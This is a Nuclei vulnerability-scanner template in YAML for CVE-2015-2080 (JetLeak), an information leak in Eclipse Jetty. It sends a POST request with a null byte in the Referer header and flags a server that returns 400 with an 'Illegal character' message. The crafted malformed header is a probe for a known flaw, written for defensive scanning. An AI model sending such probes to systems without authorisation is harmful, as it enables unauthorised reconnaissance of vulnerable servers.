nuclei-templates/cves/2015/CVE-2015-2080.yaml

27 lines
670 B
YAML

id: CVE-2015-2080
info:
name: Eclipse Jetty Remote Leakage
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-2080
description: |
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
requests:
- method: POST
path:
- "{{BaseURL}}/"
headers:
Referer: \x00
matchers-condition: and
matchers:
- type: status
status:
- 400
- type: word
words:
- "Illegal character 0x0 in state"
part: body